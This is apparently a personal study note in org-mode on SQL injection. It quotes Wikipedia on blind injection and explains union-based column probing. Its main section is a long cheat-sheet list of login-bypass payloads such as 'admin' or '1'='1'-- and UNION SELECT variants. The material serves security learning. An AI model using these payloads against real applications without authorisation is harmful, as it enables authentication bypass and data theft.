:PROPERTIES:
:ID:       20113752-5c4c-4119-ae16-f96d112bdfaf
:END:
#+title: SQL Injection
#+filetags: :webexp:Cybersecurity:

* Overview
* Blind SQL Injection
From Wikipedia:
#+begin_quote
Blind SQL injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack has traditionally been considered time-intensive because a new statement needed to be crafted for each bit recovered, and depending on its structure, the attack may consist of many unsuccessful requests. Recent advancements have allowed each request to recover multiple bits, with no unsuccessful requests, allowing for more consistent and efficient extraction. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.
#+end_quote
* Common Payloads
A typical login query would be:
#+begin_src sql
SELECT * FROM users WHERE username='username' AND password='password'
#+end_src

We can exploit the above query using:
#+begin_example
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
#+end_example
Some things to note:
- The comment sequence ~--~ causes the remainder of the query to be ignored.
- We use ~OR 1=1~ to return all data in the table (always true).

* Union Injection
Union injection attacks can be used to retrieve data from other tables within the database. To do so, two condition must be met:
1. Each query must return the same number of columns.
1. The data type in each column must be the same in each query.

An easy way to check how many columns are being returned from the original query is to use ~ORDER BY X~ where "X" is a number. In this query we order the results by different columns in the result set. This is done by specifying an index, not a column name.

To know what value each column supports, we can issue a ~UNION SELECT~.
#+begin_src sql
UNION SELECT ‘a’,NULL,NULL,NULL
#+end_src

If the return statement is limited, we can use ~group_concat(table)~ to group multiple values together.

* Tips and Tricks
- In sqlite3, we can use the keyword ~AS~ to give a column a temporary name, this helps when the query is fixed using a certain column name.

* Resources
- [[https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/][SQL Injection Authentication Bypass Cheat Sheet]]
- Wikipedia's [[https://en.wikipedia.org/wiki/SQL_injection#cite_note-20][page]] about SQL Injection
- [[https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635][SQL Injection with UNION]]
